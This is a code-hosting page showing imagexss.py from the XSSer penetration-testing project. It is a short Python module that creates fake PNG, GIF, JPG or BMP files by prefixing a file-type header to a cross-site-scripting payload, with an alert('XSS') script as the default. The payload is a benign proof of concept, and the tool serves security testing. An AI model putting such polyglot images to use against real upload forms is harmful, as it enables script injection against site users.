Home Explore Help
Sign In
epsylon
/
xsser
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0
Tree: 175856b58e
Branches Tags
xsser
/
core
/
imagexss.py

imagexss.py 2.3 KB
History Raw

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162 
  1. #!/usr/bin/env python
    2. 

  2. # -*- coding: utf-8 -*-"
    3. 

  3. # vim: set expandtab tabstop=4 shiftwidth=4:
    4. 

  4. """
    5. 

  5. This file is part of the XSSer project, https://xsser.03c8.net
    6. 

  6. 

  7. Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
    8. 

  8. 

  9. xsser is free software; you can redistribute it and/or modify it under
    10. 

  10. the terms of the GNU General Public License as published by the Free
    11. 

  11. Software Foundation version 3 of the License.
    12. 

  12. 

  13. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
    14. 

  14. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    15. 

  15. FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
    16. 

  16. details.
    17. 

  17. 

  18. You should have received a copy of the GNU General Public License along
    19. 

  19. with xsser; if not, write to the Free Software Foundation, Inc., 51
    20. 

  20. Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
    21. 

  21. """
    22. 

  22. import os
    23. 

  23. 

  24. class ImageInjections(object):
    25. 

  25.     
    26. 

  26.     def __init__(self, payload =''):
    27. 

  27.         self._payload = payload
    28. 

  28. 

  29.     def image_xss(self, filename, payload):
    30. 

  30.         """
    31. 

  31.         Create -fake- image with code XSS injected.
    32. 

  32.         """
    33. 

  33.         # check user image name input valid extensions
    34. 

  34.         root, ext = os.path.splitext(filename)
    35. 

  35.     	# create file and inject code
    36. 

  36.         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
    37. 

  37.             f = open(filename, 'wb')
    38. 

  38.             # check user payload input
    39. 

  39.             user_payload = payload
    40. 

  40.             if not user_payload:
    41. 

  41.                 user_payload = "<script>alert('XSS')</script>"
    42. 

  42.             # inject each XSS specific code     
    43. 

  43.             if ext.lower() == ".png":
    44. 

  44.                 content = '‰PNG' + user_payload
    45. 

  45.             elif ext.lower() == ".gif":
    46. 

  46.                 content = 'GIF89a' + user_payload
    47. 

  47.             elif ext.lower() == ".jpg":
    48. 

  48.                 content = 'ÿØÿà JFIF' + user_payload
    49. 

  49.             elif ext.lower() == ".bmp":
    50. 

  50.                 content = 'BMFÖ' + user_payload
    51. 

  51.             # write and close
    52. 

  52.             f.write(content)
    53. 

  53.             f.close()
    54. 

  54.             image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
    55. 

  55.         else:
    56. 

  56.             image_results = "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"
    57. 

  57.         return image_results
    58. 

  58. 

  59. if __name__ == '__main__':
    60. 

  60.     image_xss_injection = ImageInjections('')
    61. 

  61.     print(image_xss_injection.image_xss('ImageXSSpoison.png' , "<script>alert('XSS')</script>"))
    62. 

  62.